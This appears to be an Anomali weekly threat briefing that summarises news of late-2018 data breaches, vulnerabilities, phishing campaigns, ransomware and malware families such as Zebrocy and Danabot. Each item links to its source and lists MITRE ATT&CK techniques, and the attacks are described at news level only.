Weekly Threat Briefing: Another Windows 10 Zero-Day Bug Could Allow Overwriting Files With Random Data

<div id="weekly">The intelligence in this weekís iteration discuss the following threats: APT28, Danabot, Data breaches, Miori, Phishing, RATs, Ransomware, Roma225, The Dark Overlord, Vulnerabilities, and Zebrocy. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.<div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><a href="https://www.bleepingcomputer.com/news/security/27-percent-of-passwords-from-town-of-salem-breach-already-cracked/" target="_blank">27% of Passwords From Town of Salem Breach Already Cracked </a> (January 5, 2019) Over 7.6 million unique accounts for the browser-based game "Town of Salem," had their various forms of data exposed following a server getting hacked by an unknown actor. The actor was able to obtain access to the game's database via an installed backdoor on the server. The data breach compromised user information including emails, hashed passwords (phpass, MD5 (WordPress)), MD5 (phpBB3)), IP addresses, game and forum activity, payment information such as billing information, and usernames. Since the breach which became apparent according to "DeHashed," a leaked information lookup site, on December 28, 2018, over 27%, or over 2.1 million, encrypted passwords have been decrypted via "Hashes[.]org." The creators of Town of Salem have removed three php files that allowed the threat actor the ability to install the backdoor to the server. <a href="https://forum.anomali.com/t/27-of-passwords-from-town-of-salem-breach-already-cracked/3381" target="_blank">Click here for Anomali recommendation</a><a href="https://latesthackingnews.com/2019/01/04/another-windows-10-zero-day-bug-could-allow-overwriting-files-with-random-data/" target="_blank">Another Windows 10 Zero-Day Bug Could Allow Overwriting Files With Random Data </a> (January 4, 2019) A Windows 10 zero-day vulnerability was discovered by a security researcher, "Sandboxescaper," that could allow an unauthorized user to modify files and execute arbitrary data without administrative privileges. An example of this vulnerability was shown to overwrite the "pci.sys" file that is responsible for proper operating system (OS) boot, causing a Denial-of-Service (DoS) state on the affected machine without administrative privileges. While this is a zero-day vulnerability, it may not work on some CPUs. Microsoft is aware of the vulnerability but has not yet released patch, as of this writing. <a href="https://forum.anomali.com/t/another-windows-10-zero-day-bug-could-allow-overwriting-files-with-random-data/3382" target="_blank">Click here for Anomali recommendation</a><a href="https://www.infosecurity-magazine.com/news/german-politicians-caught-in/" target="_blank">German Politicians Caught in Massive Data Leak</a> (January 4, 2019) A Twitter user under the name of "G0d" reportedly released a plethora of personal data and communications from hundreds of German politicians including Chancellor Angela Merkel. The information stolen and released include conversations with family members, credit card info, direct debit authorizations, email addresses, internal party communications, mobile phone numbers, and photos of identity cards. The data released does not appear to have contained any sensitive political discussion or documents. Various members of all parties in the Bundestag were affected, except for members of the AfD, a controversial far-right party. It is currently unclear how the data was obtained, and an investigation is ongoing. <a href="https://forum.anomali.com/t/german-politicians-caught-in-massive-data-leak/3383" target="_blank">Click here for Anomali recommendation</a><a href="https://thehackernews.com/2019/01/adobe-reader-vulnerabilities.html" target="_blank">Adobe Issues Emergency Patches for Two Critical Flaws in Acrobat and Reader </a> (January 3, 2019) Adobe released an security patch to address two critically-rated vulnerabilities that affected Acrobat and Reader for both macOS and Windows. The first vulnerability, registered as "CVE-2018-16011," is a use-after-free flaw that could allow for arbitrary code execution by a user clicking into a malicious PDF file that would grant a threat actor privileges of the current logged on user. The second vulnerability, "CVE-2018-19725," is a security bypass flaw that could allow for privilege escalation. The vulnerable systems include Acrobat and Reader DC 2015 version 2015.006.30461 and earlier, 2017 version 2017.011.30110 and earlier, and Continuous version 2019.010.20064 and earlier for the Windows and macOS operating systems. <a href="https://forum.anomali.com/t/adobe-issues-emergency-patches-for-two-critical-flaws-in-acrobat-and-reader/3384" target="_blank">Click here for Anomali recommendation</a><a href="https://www.zdnet.com/article/google-chrome-flaw-patched-three-years-after-initial-report/" target="_blank">Google Chrome Flaw Patched Three Years After Initial Report </a> (January 3, 2019) In mid-October 2018, Google quietly released a patch for a "Google Chrome for Android" vulnerability that was first reported on in May 2015. This vulnerability leaked information regarding the device's firmware version, hardware model, and security patch level without the user's knowledge. Researchers from Nightwatch Cybersecurity first discovered the flaw in 2015 where they found that the Chrome for Android's User-Agent strings contained information, such as the device name and firmware build, which the desktop User-Agent strings did not have. Revealing the device name means that threat actors could potentially translate this to the exact model of smartphone. The firmware build number meant that actors could identify the device model as well as the carrier it is running and in what specific country it is running in. The firmware number could allow actors to know how secure a device is and what vulnerabilities it may possibly have in order to then exploit those. Google initially stated the Chrome for Android was working as intended, but in October 2018, it sent out a fix for users with v70. However, this fix still is not comprehensive as devices name strings are still accessible and the device name and build number can still be viewed in "WebView" and "Custom Tabs." <a href="https://forum.anomali.com/t/google-chrome-flaw-patched-three-years-after-initial-report/3385" target="_blank">Click here for Anomali recommendation</a><a href="https://www.bleepingcomputer.com/news/security/abine-blur-password-manager-user-data-exposed-online/" target="_blank">Abine Blur Password Manager User Data Exposed Online </a> (January 2, 2019) Abine, the creators of privacy and password manager, "Blur," released a notice on December 31, 2018, that customer information was exposed on the Internet via a misconfigured Amazon Web Services (AWS) S3 bucket file. On December 13th, Abine was notified by a security researcher about the misconfigured file that exposed customers who registered prior to January 2016, which approximates to around 2.4 million users. The exposed data includes: email addresses, encrypted passwords, some full names of users, last and second to last IP addresses used to log into Blur, and password hints from the old "MaskMe" product. No sensitive data such as bank information, stored usernames and passwords, or masked emails/phone numbers were exposed. As of this writing, Abine has resecured the misconfigured S3 file. <a href="http://https://forum.anomali.com/t/abine-blur-password-manager-user-data-exposed-online/3386" target="_blank">Click here for Anomali recommendation</a><a href="https://thenextweb.com/security/2019/01/01/twitter-let-someone-promote-an-obvious-paypal-phishing-scam/" target="_blank">Twitter Let Someone Promote an Obvious PayPal Phishing Scam </a> (January 2, 2019) A Twitter post by the unverified account, "@PaypalChristm," was publicly promoted by Twitter despite being a phishing scheme. The fake PayPal post was promoting an "end of the year sweepstakes" that provided a link "paypall-christmasgifts[.]com" to verify a person's PayPal details to be entered to win unnamed prizes. Clicking the link takes the user to a fake, unsecured PayPal login page. If the user logs in, they are directed to a form to verify their card credentials by entering in their name, card number, expiry date, CSC, and billing address. <a href="https://forum.anomali.com/t/twitter-let-someone-promote-an-obvious-paypal-phishing-scam/3387" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&CK] Spearphishing Link (T1192)</a><a href="https://www.abc.net.au/news/2019-01-01/victorian-government-employee-directory-data-breach/10676932" target="_blank">Data Breach Sees Victorian Government Employees' Details Stolen </a> (January 1, 2019) 30,000 employees of the Victorian government in Australia found that their work details had been accessed and downloaded by an unknown person. The work details consisted of information including employees' job titles, work emails, work phone numbers, and possibly mobile phone numbers were affected in this breach. No banking or other financial information was compromised, but authorities say that employees should be wary because this could lead to future phishing or other social engineering attempts. <a href="https://forum.anomali.com/t/data-breach-sees-victorian-government-employees-details-stolen/3388" target="_blank">Click here for Anomali recommendation</a><a href="https://www.databreaches.net/from-thedarkoverlord-9-11-files/" target="_blank">From The Dark Overlord 9/11 FilesÖ A Glimpse into What Your Life is Worth</a> (January 1, 2019) The threat group, "The Dark Overlord" (TDO) is attempting to extort money out of several organizations that dealt with the litigation and insurance claims following the 9/11 attacks. Companies such as Hiscox Syndicates Ltd, Lloyds of London, and Silverstein Properties are purportedly all compromised by The Dark Overlord having a large amount of documentation stolen. The threat group is exploiting the underlying emotion that is tied to 9/11 and its aftermath in order to garner more global attention as well as scare the organizations into paying their ransom. The extortion note sent to the companies contains a link for a 10 gigabyte (GB) archive of files that are encrypted and states that if they do not receive the ransom amount, they will release the decryption keys that would decrypt certain sets of files in the cache at a time. The Dark Overlord is notorious for exploiting anyone and everyone, with complete disregard, simply to obtain a large illicit profit. <a href="https://forum.anomali.com/t/from-the-dark-overlord-9-11-files-a-glimpse-into-what-your-life-is-worth/3389" target="_blank">Click here for Anomali recommendation</a><a href="https://www.zdnet.com/article/ransomware-suspected-in-cyberattack-that-crippled-major-us-newspapers/" target="_blank">Ransomware Suspected in Cyberattack that Crippled Major US Newspapers </a> (December 30, 2018) A ransomware family, suspected to be "Ryuk," affected newspaper printing centers operated by "Tribune Publishing." Tribune Publishing is one of the US' largest media companies and owns multiple newspaper outlets such as the Chicago Tribune, Daily Press, Orlando Sentinel, and the Virginia Gazette, among others. The Ryuk ransomware was discussed by Check Point researchers in August 2018, in which the researchers found that the actors behind the campaigns were targeting organization that could afford to pay a large ransom ranging between 15 to 50 bitcoins (approximately $57,655 to $192,184 USD). While the specific details of what malware affected Tribune Publishing, sources report that a "foreign entity" was behind this attack. The entities confirmed to have been affected by this incident include the print editions of the Baltimore Sun, Capital Gazette, and the Chicago Tribune, among others, that were published on December 29, and December 30, 2018. <a href="https://forum.anomali.com/t/ransomware-suspected-in-cyberattack-that-crippled-major-us-newspapers/3390" target="_blank">Click here for Anomali recommendation</a><a href="https://www.bleepingcomputer.com/news/security/beware-of-american-express-emails-with-attached-phishing-form/" target="_blank">Beware of American Express Emails With Attached Phishing Form </a> (December 29, 2018) A phishing campaign has been discovered targeting American Express card users with emails purporting that there has been some security issues raised in relation to the user's card. The email states there is a security concern that requires addressing and contains an attached HTML form that requests various information. The information required in the form included: American Express card number, birth year, CVV, card ID number, expiration date, first elementary (primary) school name, mother's birth date and maiden name, online account credentials, and security pin. It also then requests the user enter in a new username and password to use. If the user enters this information into the forms and sends them off, they will be sent to the threat actor's remote host. After the remote host receives the data, it will redirect a user to a legitimate "americanexpress[.]com" page that says "thank you for your feedback." <a href="https://forum.anomali.com/t/beware-of-american-express-emails-with-attached-phishing-form/3391" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&CK] Spearphishing Link (T1192)</a><a href="https://blog.yoroi.company/research/the-enigmatic-roma225-campaign/" target="_blank">The Enigmatic "Roma225" Campaign </a> (December 27, 2018) Cybaze-Yoroi ZLab researchers identified a spear phishing email campaign targeting Italian automotive companies with the intent to infect victims with the "RevengeRAT" Remote Access Trojan (RAT). The campaign has been dubbed "Roma225" due to the repeated sequences of "roma225" strings found throughout the code to separate data fields. The phishing email pretended to be from a senior partner of a Brazilian law firm "Veirano Advogados," and contained a Microsoft PowerPoint attachment that requested macros to be enabled, if opened. If the macros are enabled, a "mshta.exe" tool runs and downloads the next stage of the malware dropper from a fake blog page. The blog page contains hidden VBScript code, that has the commands to download and install the RevengeRAT payload. RevengeRAT contacts the Command and Control (C2) server to relay the infected machine's information to the threat actors. At the time of this writing, it is unclear who is behind the attack and why they are targeting these specific organizations. <a href="https://forum.anomali.com/t/the-enigmatic-roma225-campaign/3392" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&CK] Spearphishing Attachment (T1193)</a> | <a href="https://ui.threatstream.com/ttp/947223">[MITRE ATT&CK] Mshta (T1170)</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&CK] Scripting (T1064)</a><a href="https://www.cyberscoop.com/bevmo-online-payment-breach-ncr/" target="_blank">BevMo Payment Breach Affects Thousands, with Researchers Pointing to Magecart</a> (December 27, 2018) The California-based alcoholic beverage retailer "BevMo," has confirmed that it was affected by a data breach that took place from August 2, 2018 through September 26, 2018. Threat actors were able to inject data-stealing JavaScript onto BevMo's checkout page that stole payment information through aforementioned dates. The types of stolen information consist of the following: card numbers, expiration dates and security codes, names, and phone numbers. The incident is believed to affect approximately 14,579 customers as of the time of this writing. Furthermore, BevMo has stated that the breach has been contained and that their service provider is continuing to monitor for any suspicious behavior. Researchers believed that this website compromise and subsequent theft was possibly conducted by the financially-motivated threat group "MageCart," due to similar tactics observed in prior incidents. <a href="https://forum.anomali.com/t/bevmo-payment-breach-affects-thousands-with-researchers-pointing-to-magecart/3393" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947243">[MITRE ATT&CK] Input Capture (T1056)</a><a href="https://www.bleepingcomputer.com/news/security/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/" target="_blank">JungleSec Ransomware Infects Victims Through IPMI Remote Consoles </a> (December 26, 2018) The ransomware called "JungleSec," which was first identified in November 2018, has been found to be infecting users through unsecured Intelligent Platform Management Interfaces (IPMIs), according to BleepingComputer reporters. Victims of the ransomware told reporters that their Linux servers were infected with JungleSec via "unsecured IPMI devices." IPMI devices are used by IT administrators to remotely access a machine. Prior to IPMIs being utilized as the initial infection vector, it was unknown how targets were being infected, including for Mac and Windows machines as well. Improperly configured and unsecured IPMIs were observed to be utilized by unknown threat actors to install the ransomware onto a machine. If a machine is infected, the user will be presented with a ransom note that demands 0.3 bitcoins ($1,119 USD) to decrypt files. <a href="https://forum.anomali.com/t/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/3394" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&CK] Brute Force (T1110)</a> | <a href="https://ui.threatstream.com/ttp/947256">[MITRE ATT&CK] Uncommonly Used Port (T1065)</a><a href="https://www.infosecurity-magazine.com/news/amazon-order-confirmation-phishing/" target="_blank">Amazon Order Confirmation Phishing Scam</a> (December 24, 2018) A sophisticated malspam campaign was observed delivering fraudulent Amazon order confirmations according to EdgeWave. The messages including headlines such as "Your Amazon.com order," "Amazon order details," and "Your order 162-2672000-0034071 has shipped." The emails show a forged order confirmation regarding the shipment of an item but did not contain any information for what was sent, practically forcing the recipient to click the "Order Details" button. Clicking the button downloads a Word document, and then requests macros to be enabled. If the user enables the macros, a PowerShell command is triggered which ultimately install the Emotet banking trojan onto the machine. <a href="https://forum.anomali.com/t/amazon-order-confirmation-phishing-scam/3395" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&CK] Spearphishing Link (T1192)</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&CK] PowerShell (T1086)</a><a href="https://www.zdnet.com/article/over-19000-orange-modems-are-leaking-wifi-credentials/" target="_blank">Over 19,000 Orange Modems are Leaking WiFi Credentials</a> (December 24, 2018) Security researcher, Troy Mursch, discovered that almost 20,000 "Orange Livebox ADSL" modems were leaking WiFi credentials. He identified at least one threat actor scanning for modems affected by a known vulnerability, registered as "CVE-2018-20377," that could allow remote access to the WiFi password and network ID for the modem's internal network. The vulnerability could allow for on-location proximity attacks, so the actor could target high-profile targets, like large organizations or wealthy homes, using the password to obtain access to the network and then launch other attacks on nearby devices. This vulnerability can also allow threat actors to create botnets, as well as obtain sensitive information. <a href="https://forum.anomali.com/t/over-19-000-orange-modems-are-leaking-wifi-credentials/3396" target="_blank">Click here for Anomali recommendation</a><a href="https://www.bleepingcomputer.com/news/security/info-on-over-500-000-students-and-staff-exposed-in-san-diego-school-district-hack/" target="_blank">Info on Over 500,000 Students and Staff Exposed in San Diego School District Hack</a> (December 22, 2018) Over half a million students going back to 2008-2009, their parents, and staff in the San Diego Unified School District (SDUSD) are believed to have been affected in a data breach. An unauthorized user sent phishing emails to staff to obtain login credentials for the district's network services. The unknown threat actor had access to information such as: dates of birth, home addresses, mailing addresses, names, social security numbers, staff benefits information, staff payroll and compensation figures, student ID numbers, and telephone numbers. In addition, student enrollment information such as schedules, health data, schools of attendance, transfer information, recorded legal notices, and attendance data were accessible as well as students' parents or guardians data, and emergency contacts of the district's employees. It is not clear what the threat actor did with the information they had access to, but they were able to access it for an extended period of time, between January 2018 until November 2018. According to the district, they had discovered the intrusion in October, but did not disclose it until now so they could investigate without alerting the threat actor. <a href="https://forum.anomali.com/t/info-on-over-500-000-students-and-staff-exposed-in-san-diego-school-district-hack/3397" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&CK] Spearphishing Link (T1192)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&CK] Spearphishing Attachment (T1193)</a><a href="https://www.infosecurity-magazine.com/news/ibm-kernelbased-vulnerability/" target="_blank">IBM Kernel-Based Vulnerability Discovered</a> (December 21, 2018) Researchers from Trustwave found a kernel-based vulnerability in IBM's "Trusteer Rapport" driver for macOS. Trusteer Rapport is an endpoint protection solution that is designed to protect users against financial malware and phishing attacks. This vulnerability could allow for privilege escalation on the local device, letting a potential threat actor to disable Trusteer completely. According to Trustwave, IBM was unable to successfully develop a patch for the vulnerability within the 90-day disclosure timeframe, despite Trustwave extending it an extra 30 days on top of that before disclosing the vulnerability to the public. The bug is a result of a signed bug issue. <a href="https://forum.anomali.com/t/ibm-kernel-based-vulnerability-discovered/3398" target="_blank">Click here for Anomali recommendation</a><a href="https://www.infosecurity-magazine.com/news/caribou-coffee-card-breach-hits/" target="_blank">Caribou Coffee Card Breach Hits 265 Stores</a> (December 21, 2018) The US coffee chain "Caribou Coffee" reported that it had suffered a data breach that impacted payment cards. They discovered unusual network traffic on November 28, 2018 and found that there was unauthorized access to their Point-of-Sales (POS) systems. The company stated that customers who had visited one of their chain locations between August 28, 2018 and December 3, 2018, are likely to have had their names, card number, CVV, and expiration date compromised. According to Caribou Coffee, "payments made through your Caribou Coffee Perks account or other loyalty account were not affected. Any catering orders placed online with Bruegger's Bagels, Einstein Bros. Bagels, Manhattan Bagel and Noah's NY Bagels were also not affected by this breach." <a href="https://forum.anomali.com/t/caribou-coffee-card-breach-hits-265-stores/3399" target="_blank">Click here for Anomali recommendation</a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/" target="_blank">With Mirai Comes Miori: IoT Botnet Delivered via ThinkPHP Remote Code Execution </a> (December 20, 2018) Trend Micro researchers have published their analysis on a variant of the "Mirai" Internet-of-Things (IoT) malware called "Miori." Multiple Mirai various have appeared since the malware's source code was leaked in 2016. The Miori malware was found to be propagating itself via "a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP." The vulnerability has been observed being utilized by other Mirai variants (APEP, IZ1H9) for which the details were first mentioned on December 11, 2018. The vulnerability affects ThinkPHP versions before "5.0.23 and 5.1.31." Additionally, researchers found that the actors behind Miori "used the Thinkpad RCE to make vulnerable machines download and execute their malware," and subsequently initiate the "Telnet" protocol to brute force other IPs. <a href="https://forum.anomali.com/t/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution/3400" target="_blank">Click here for Anomali recommendation</a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/android-wallpaper-apps-found-running-ad-fraud-scheme/" target="_blank">Android Wallpaper Apps Found Running Ad Fraud Scheme</a> (December 19, 2018) At least 15 different fake wallpaper applications were discovered in the Google Play store by Trend Micro researchers that were secretly committing advertisement fraud. The applications were primarily downloaded in Germany, Italy, Taiwan, and the US, and were downloaded over 220,000 different times. The fake applications promised wallpaper background that were aesthetically appealing and had several good reviews to appear legitimate. If downloaded, the application will then decode the Command and Control (C2) server address and mute the entire process so the user does not detect it occurring. The application will send an HTTP GET request to receive a JSON-formatted list with the feeds for the advertisements the application is intending to get. The ads run in the background of the infected device and garners a profit for the threat actors who developed the applications. <a href="https://forum.anomali.com/t/android-wallpaper-apps-found-running-ad-fraud-scheme/3401" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&CK] Spearphishing via Service (T1194)</a><a href="https://asert.arbornetworks.com/danabots-travels-a-global-perspective/" target="_blank">Danabot's Travels, A Global Perspective </a> (December 19, 2018) The "Danabot" banking trojan has undergone consistent growth throughout 2018 since its discovery in May of this year, according to Arbor Networks researchers. Danabot is predominantly distributed via malspam. The malware is described as a modular banking trojan that is capable of stealing financial credentials, primarily though web-injection attacks that utilize multiple Dynamic Link Libraries (DLLs). In addition, Danabot also has remote access features via Virtual Network Computing (VNC) and Remote Desktop Protocol (RDP) to allow threat actors to conduct more malicious activity on an infected machine. Researchers note that Danabot is encroaching upon sophistication levels of notorious banking trojans such as Dridex and Trickbot due to the dynamic and active development of the malware by various actors. <a href="https://forum.anomali.com/t/danabots-travels-a-global-perspective/3402" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&CK] Remote Access Tools (T1219)</a><a href="https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies" target="_blank">A "JAR" Full of Problems for Financial Services Companies</a> (December 19, 2018) An email campaign targeting banks and financial services organizations has been observed by researchers at Menlo Labs that attempts to trick victims into clicking on the provided links that install malware. The campaign was found to be active in the UK and US since August 2018, and uses Google's Cloud Storage service, "storage.googleapis[.]com," to host the malicious payload to make it appear legitimate. The unknown threat actors utilize malicious URLs as the detection of them is a lot lower, even on machines with antivirus and spam filters, if the URL is not already in the threat repository. The malicious links either install a VBScript payload or a JAR file. The VBScript and JAR file payload appear to belong to the "Houdini" malware family that install Remote Access Trojans (RAT) into the machine. <a href="https://forum.anomali.com/t/a-jar-full-of-problems-for-financial-services-companies/3403" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&CK] Spearphishing Link (T1192)</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&CK] Remote Access Tools (T1219)</a><a href="https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/" target="_blank">Widespread Apple ID Phishing Attack Pretends to be App Store Receipts </a> (December 18, 2018) A phishing campaign masquerading as a purchase receipt from the Apple "App Store" was attempting to steal Personally Identifiable Information (PII). The email purports that the recipient has made an App store purchase by thanking them in the email body and provides a PDF attachment that supposedly contains additional details about the purchase. The PDF attachment contains links that claim to provide more information regarding the "purchase" and utilize shortened URLs to hide where the links lead to. If a link is followed from the PDF document, a recipient will be directed to a fake Apple ID login page and, if credentials are entered, the user will be presented with a text box that claims that the "Apple ID has been locked for security reasons. You must unlock your account before signing in." If the unlock button is clicked, the user will be asked to fill out various data fields to supposedly unlock their account including: address, date of birth, driver's license number, passport number, payment information, social security number, and various security questions such as mother's maiden name. <a href="https://forum.anomali.com/t/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/3404" target="_blank">Click here for Anomali recommendation</a><a href="https://www.amnesty.org/en/latest/research/2018/12/when-best-practice-is-not-good-enough/" target="_blank">When Best Practice Isn't Good Enough: Large Campaigns of Phishing Attacks in Middle East and North Africa Target Privacy-Conscious Users</a> (December 19, 2018) Amnesty International has observed several phishing campaigns that are targeting users in the Middle East and Northern Africa. Two recent phishing sites were discovered that pretended to be the secure email service providers, Tutanota and ProtonMail, and attempted to deceive users into entering in their email credentials. The threat actors purchased the domain "tutanota[.]org" and replicated the legitimate site, even obtaining "https://" security certificates to make it appear legitimate. If the user entered in their credentials to log in, those credentials were stored by the threat actors whilst also going through a valid login procedure with the original and legitimate Tutanota site. Similarly, the email service provider "ProtonMail" was also replicated, this time with the threat actors inputting an extra "e" into the domain name so it was "protonemail[.]ch." If a user entered their credentials into this fake site, the same process would occur as with the Tutanota phishing sites. <a href="https://forum.anomali.com/t/when-best-practice-isnt-good-enough-large-campaigns-of-phishing-attacks-in-middle-east-and-north-africa-target-privacy-conscious-users/3405" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&CK] Spearphishing via Service (T1194)</a><a href="https://www.infosecurity-magazine.com/news/nasa-staff-at-risk-after-server/" target="_blank">NASA Staff at Risk After Server Breach </a> (December 19, 2018) The US-based space agency, NASA, announced that they may have suffered a data breach back in October 2018. They stated that one of their servers that stored employees' Social Security Numbers (SSN) and other Personally Identifiable Information (PII) might have been compromised and accessed by unauthorized persons. Employees that were on-boarded between July 2006 and October 2018 may have been affected in the breach. NASA is still investigating the compromise to determine the full extent of impacted employees and what sort of information was actually affected. <a href="https://forum.anomali.com/t/nasa-staff-at-risk-after-server-breach/3406" target="_blank">Click here for Anomali recommendation</a><a href="https://www.bleepingcomputer.com/news/security/microsoft-releases-out-of-band-security-update-for-internet-explorer-rce-zero-day/" target="_blank">Microsoft Releases Out-of-Band Security Update for Internet Explorer RCE Zero-Day </a> (December 19, 2018) A Remote Code Execution (RCE) zero-day vulnerability, registered as "CVE-2018-8653," has been discovered in Microsoft's Internet Explorer web browser by Google's Threat Analysis Group. Researchers were able to identify this vulnerability when they observed it being exploited in targeted attacks. The vulnerability exists in how Internet Explorer handles objects in memory, and can be exploited "to corrupt memory in such a way that attackers could execute code under the security privileges of the logged in user," according to Microsoft's security advisory. Actors could also utilize this vulnerability to conduct malicious activity via custom-created websites. This could allow actors to use the vulnerability in exploit kits or in legitimate websites that have been compromised. <a href="https://forum.anomali.com/t/microsoft-releases-out-of-band-security-update-for-internet-explorer-rce-zero-day/3407" target="_blank">Click here for Anomali recommendation</a><a href="https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/" target="_blank">Sofacy Creates New ëGo' Variant of Zebrocy Tool</a> (December 18, 2018) Researchers from Palo Alto discovered Advanced Persistent Threat (APT) group, "Sofacy" (also known as APT28, FancyBear, Sednit, and STRONTIUM) to be utilizing a new version of the trojan "Zebrocy." This new version of the Zebrocy trojan is written in the language "Go" likely to differentiate the structure of the trojan to deflect detection. Sofacy was seen to have conducted two different spear phishing campaigns to install this version of Zebrocy. The first campaign was initiated on October 11, 2018 and the spear phishing emails contained themes surrounding the repercussions of recent US sanctions on Russia with an LNK shortcut attachment. The LNK attachment was supposed to run a series of PowerShell scripts to then execute a payload, but the PowerShell scripts were coded incorrectly so the first campaign was unsuccessful. A second email campaign followed from mid-October 2018 until mid-November 2018. This email contained a Word document that requested content to be enabled to view properly. If it was enabled, the Go version of Zebrocy would be installed which allowed the APT group to screenshot the system, gather system-specific information using a legitimate GitHub library, and send all that information to a specified Command and Control (C2) server via an HTTP POST request. <a href="https://forum.anomali.com/t/sofacy-creates-new-go-variant-of-zebrocy-tool/3408" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947186">[MITRE ATT&CK] Software Packing (T1045)</a> | <a href="https://ui.threatstream.com/ttp/947211">[MITRE ATT&CK] Registry Run Keys / Start Folder (T1060)</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&CK] Web Service (T1102)</a> | <a href="https://ui.threatstream.com/ttp/947278">[MITRE ATT&CK] Remote File Copy (T1105)</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&CK] Screen Capture (T1113)</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&CK] Windows Management Instrumentation (T1047)</a> | <a href="https://ui.threatstream.com/ttp/947124">[MITRE ATT&CK] Peripheral Device Discovery (T1120)</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&CK] System Information Discovery (T1082)</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&CK] Process Discovery (T1057)</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&CK] Standard Application Layer Protocol (T1071)</a> | <a href="https://ui.threatstream.com/ttp/947117">[MITRE ATT&CK] Automated Collection (T1119)</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&CK] Deobfuscate/Decode Files or Information (T1140)</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&CK] PowerShell (T1086)</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&CK] Command-Line Interface (T1059)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&CK] Spearphishing Attachment (T1193)</a><a href="https://www.zdnet.com/article/twitter-discloses-suspected-state-sponsored-attack/" target="_blank">Twitter Disclosed Suspected State-Sponsored Attack </a> (December 17, 2018) The Twitter social media platform has confirmed that it was targeted with an attack by threat actors that resulted in unauthorized access to user data. Twitter has stated that the attack took place on November 15, 2018 in which the unknown actors exploited a vulnerability. The vulnerability allowed the actors to identify user account country codes, phone numbers, and if the account was locked. Twitter suspects is a state-sponsored group is behind the attack, but provided no evidence of their claim besides IP address' traffic from China and Saudi Arabia. Twitter stated that it fixed the bug on November 16, 2018. At the time of this writing, it is unknown what the purpose or motivation was behind this attack. <a href="https://forum.anomali.com/t/twitter-disclosed-suspected-state-sponsored-attack/3409" target="_blank">Click here for Anomali recommendation</a><a href="https://blog.sucuri.net/2018/12/clever-seo-spam-injection.html" target="_blank">Clever SEO Spam Injection </a> (December 17, 2018) Sucuri researchers have reported their findings on an interesting malware threat actors have been observed injecting Search Engine Optimization (SEO) spam on WordPress websites. Researchers observed 173 websites have been compromised with SEO spam injections by analyzing the websites' "theme's functions.php file loading content from the WordPress's wp_options table" in addition discovering that the malicious code loads a "theme_css" option, which is abnormal for CSS loading a WordPress theme. The malicious code found on the affected sites was observed to be capable of adding concealed links for search engine indexing, as well as capturing specific requests to the affected site and redirecting the website visitors to spam content. <a href="https://forum.anomali.com/t/clever-seo-spam-injection/3410" target="_blank">Click here for Anomali recommendation</a> MITRE ATT&CK: <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&CK] Process Injection (T1055)</a></div></div>